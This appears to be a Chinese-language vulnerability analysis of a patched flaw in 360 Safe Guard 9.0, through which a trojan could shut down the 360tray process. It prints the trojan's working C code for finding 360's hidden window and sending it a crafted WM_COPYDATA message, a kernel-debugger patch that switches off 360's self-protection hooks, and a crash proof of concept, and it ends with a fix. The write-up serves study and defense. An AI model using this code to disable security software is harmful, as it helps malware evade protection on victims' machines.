注:本文测试环境为360安全卫士9.0,最新版的安全卫士已修复此漏洞
现象
某个木马运行后可以关闭360安全卫士,经过逆向分析发现该木马只是简单运行了以下代码:
/*
HMODULE h360 =GetModuleHandle(TEXT("safemon.dll")); int i = 0; for (i = 0; i<0x30000; i++) { if (memcmp((BYTE *)(h360+i), "\x83\xEC\x10\x56\x8D\x44\x24\x04\x50",9)==0) { break; } } if (i==0x30000) { return; } FARPROC funcGet360HWND = (FARPROC)(h360+i); HWND hWnd = (HWND)funcGet360HWND(); COPYDATASTRUCT cpdata; cpdata.dwData = 0x4d47534d; cpdata.cbData = 0x1000; cpdata.lpData = msgbuf; //长度0x1000字节的随即数据,其中不能有连续\x00\x00 SendMessage(hWnd, WM_COPYDATA, NULL,(LPARAM)&cpdata); */
我们自己用上面代码运行之后,360安全卫士的进程(360tray.exe)就自动退出了。注意:这个程序必须是带窗口的程序,而不能使控制台程序,因为控制台程序是不加载safemon.dll的。
攻击原理
上面如此简单的代码就能导致关闭360,我们来看一下这段代码到底做了什么?首先获得safemon.dll的模块地址,每个有图形界面都会加载这个dll。然后从这个模块里找一处特征代码,经分析发现找的是以下代码:
67366570 83EC 10 sub esp, 10 67366573 56 push esi 67366574 8D4424 04 lea eax, dword ptr [esp+4] 67366578 50 push eax 67366579 6A 00 push 0 6736657B 8D4C24 10 lea ecx, dword ptr [esp+10] 6736657F 51 push ecx 67366580 68 40653667 push 67366540 67366585 6A 00 push 0 67366587 6A 00 push 0 67366589 C74424 20 E48D4>mov dwordptr [esp+20], 67418DE4 ; ASCII "Q360SafeMonClass" 67366591 C74424 24 00000>mov dwordptr [esp+24], 0 67366599 C74424 28 00000>mov dwordptr [esp+28], 0 673665A1 FF15 10D34067 call dword ptr [<&KERNEL32.GetCurrentProcess>] ; kernel32.GetCurrentProcess 673665A7 50 push eax 673665A8 FF15 58D14067 call dword ptr[<&KERNEL32.CreateRemoteThread>] ; kernel32.CreateRemoteThread 673665AE 8BF0 mov esi,eax 673665B0 85F6 test esi, esi 673665B2 74 10 je short 673665C4 673665B4 6A FF push -1 673665B6 56 push esi 673665B7 FF15 24D14067 call dword ptr [<&KERNEL32.WaitForSingleObject>] ; kernel32.WaitForSingleObject 673665BD 56 push esi 673665BE FF15 20D34067 call dword ptr[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle 673665C4 8B4424 10 mov eax, dword ptr [esp+10] 673665C8 5E pop esi 673665C9 83C4 10 add esp, 10 673665CC C3 retn
其作用就是找到Q360SafeMonClass的窗口句柄。找到这段代码后就会执行这段代码来获取该窗口句柄。为什么不直接用FindWindow来查找呢?据分析应该是360做了一些防护,直接找怕找不到。
找到这个窗口后会给他发送WM_COPYDATA消息,附带的消息COPYDATASTRUCT结构的dwData是0x4d47534d,数据长度是0×1000,内容是随机数据。
我自己写了个程序模拟上述功能后,运行成功结束了360tray的进程,证明原理是没有错的。
漏洞调试
究竟是什么原因导致360tray如此简单就被关闭呢,我决定调试一下360看,启动OD准备附加360tray进程,发现无法附加,360做了保护。要想调试360首先要把保护去掉。
用XueTr看360的内核Hook点,并尝试恢复:
恢复之后尝试OD附加仍然失败,再刷新hook点已经被恢复了,这是当然的,360也要保护自身嘛。于是windbg开双机调试,在hook点下写断点,这样当360驱动恢复这里的时候,我们把他nop掉。
然后只要
kd> eb f747ed78 c3 kd> u f747ed78 Hookport+0xcd78: f747ed78 c3 ret f747ed79 ff558b call dword ptr [ebp-75h] f747ed7c ec in al,dx f747ed7d 51 push ecx f747ed7e 51 push ecx f747ed7f 8d45fc lea eax,[ebp-4] f747ed82 50 push eax f747ed83 ff1594ff47f7 call dword ptr [Hookport+0xdf94 (f747ff94)] kd> g
这时候只要再恢复内核hook点,360就哑巴了,然后成功用OD附加360tray进程:
漏洞原理
经过调试发现,导致360出错退出的地方在360safemonpro.tpi这个模块里inline编译的vsnwprintf,从这里调用:
其中va_list参数里有我们WM_COPYDATA消息传进去的数据,然后在里面进入_woutput_l的时候出错了:
对应的源代码是:
output.c
/*textlen now contains length in multibyte chars */ } else{ if(text.wz== NULL) /* NULLpassed, use special string */ text.wz = __wnullstring; bufferiswide= 1; pwch= text.wz; while(i-- && *pwch) //这里出错了 ++pwch; textlen= (int)(pwch- text.wz); /* in wchar_ts*/ /*textlen now contains length in wide chars */ }
看起来360的用法是没有错的,这里不存在溢出之类的漏洞,我分析认为这是微软挖的一个坑,360不幸掉进去了,对WM_COPYDATA的数据处理不当回导致访问未映射的内存。
以下是来自网上的WM_COPYDATA数据传递的原理:
跨线程的WM_COPYDATA没有使用共享内存,反而复制了两次数据 发送者SendMessage->xxxSendMessageTimeout->xxxInterSendMsgEx(UserAllocPoolWithQuota分配内核内存,将用户数据复制到内核空间)->SetWakeBit唤醒接受者->SetWakeBit等待应答 接受者xxxReceiveMessage->XXXSENDMESSAGETOCLIENT(宏)->ScSendMessageSMS(也是宏)->SfnCOPYDATA(sender side)->CaptureCallbackData(把数据从内核空间复制到用户空间)->KeUserModeCallback(转到用户模式)->SfnCOPYDATA(receiver side)->窗口过程->回到内核模式,应答发送者...........
所以传递的数据并不是一块新分配的heap,而0×1000为单位长度映射的内存空间,是一块没头没尾的空间,一旦使用一些字符串操作函数直接访问这块空间,很容易造成越界访问到没映射的内存里。
为了证实这个理论,我们可以自己写一个WM_COPYDATA的是以消息处理函数,模拟漏洞的产生过程:
BOOL CrecvDlg::OnCopyData(CWnd* pWnd, COPYDATASTRUCT* pCopyDataStruct) { wchar_t buf[0x2000]={0}; _snwprintf(buf, 0x2000, L"url=%s", pCopyDataStruct->lpData); return CDialog::OnCopyData(pWnd, pCopyDataStruct); }
这段代码看上去是没什么问题的,直接把传进来的lpData当做字符串来处理。我们再写一个发送函数:
HWND hWnd=FindWindowA("#32770","recv"); if (hWnd) { int len=0x1000; //这一定要是0x1000的整数倍 char*buf=new char[len]; memset(buf, 0x41, len); COPYDATASTRUCTcpdata; cpdata.dwData = 0x4d47534d; cpdata.cbData = len; cpdata.lpData = buf; SendMessage(hWnd, WM_COPYDATA,NULL, (LPARAM)&cpdata); delete[] buf; }
运行发送消息后,接收消息的程序报错了,出错点就是刚才分析的地方。
总结
严格意义上讲,导致360被结束的这个问题应该不算一个漏洞,而是由于微软没对使用COPYDATASTRUCT.lpData的内存做一些要求,正常的库函数访问的时候就可能导致出错。要安全使用COPYDATASTRUCT.lpData,应该把这块内存先拷贝出来,然后再进行操作。
另一方面,这个漏洞为我们指引了寻找360漏洞的方向,凡是有用户能控制输入的地方都有可能存在此类漏洞。